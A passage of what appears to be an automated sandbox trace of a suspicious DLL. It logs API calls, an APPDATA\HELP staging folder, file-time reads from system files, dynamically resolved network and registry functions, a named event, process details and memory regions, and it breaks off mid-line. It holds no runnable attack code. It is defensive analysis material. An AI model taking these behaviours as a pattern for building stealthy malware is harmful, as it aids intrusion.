0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.470] SetLastError (dwErrCode=0x0) [0032.470] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.471] SetLastError (dwErrCode=0x0) [0032.471] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.472] SetLastError (dwErrCode=0x0) [0032.472] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.473] SetLastError (dwErrCode=0x0) [0032.473] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.474] SetLastError (dwErrCode=0x0) [0032.474] GetLastError () returned 0x0 [0032.475] SetLastError (dwErrCode=0x0) [0032.475] GetLastError () returned 0x0 [0032.475] SetLastError (dwErrCode=0x0) [0032.475] GetLastError () returned 0x0 [0032.475] SetLastError (dwErrCode=0x0) [0032.475] GetLastError () returned 0x0 [0032.475] SetLastError (dwErrCode=0x0) [0032.475] GetLastError () returned 0x0 [0032.475] SetLastError (dwErrCode=0x0) [0032.475] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.475] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.475] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.476] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f458 | out: lpSystemTimeAsFileTime=0x22f458*(dwLowDateTime=0xe1139b50, dwHighDateTime=0x1d3dfba)) [0032.477] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f390, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.477] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f278, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetLastError () returned 0x0 [0032.477] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.477] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.477] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.477] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.477] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.477] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.478] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.478] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.478] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.478] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.478] GetLastError () returned 0xb7 [0032.478] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.478] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.478] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.478] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.478] wsprintfA (in: param_1=0x22f0f8, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.485] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.485] wsprintfA (in: param_1=0x22eff4, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.485] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.485] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.485] CloseHandle (hObject=0x74) returned 1 [0032.485] GetLastError () returned 0x0 [0032.485] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.485] GetLastError () returned 0x0 [0032.485] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.485] GetSystemDirectoryA (in: lpBuffer=0x22f0f8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.485] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.485] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.485] CloseHandle (hObject=0x74) returned 1 [0032.485] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.486] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.486] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.487] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.487] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.487] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.487] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.487] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.487] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.487] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.487] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.487] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.488] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.489] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.489] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.489] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.489] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.489] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.489] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.489] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.489] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0032.489] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.489] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.489] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.489] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.489] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.489] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.489] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.489] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.489] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.489] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.489] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.490] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.490] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.490] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.490] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.490] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.490] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.490] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.490] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.490] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.490] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.490] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.490] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.490] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.490] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.490] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.490] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.490] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.490] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0032.492] HeapDestroy (hHeap=0x3d0000) returned 1 Process: id = "23" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f940" os_pid = "0xb64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1106 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1107 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1108 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1109 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1110 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1111 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1112 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1113 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1114 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1115 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1116 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1117 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1118 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1119 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1120 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1121 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1122 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1123 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1124 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1125 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1126 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1127 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1128 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1129 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1130 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1131 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1132 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1133 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1134 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1135 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1136 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1137 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1138 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1139 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1140 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = 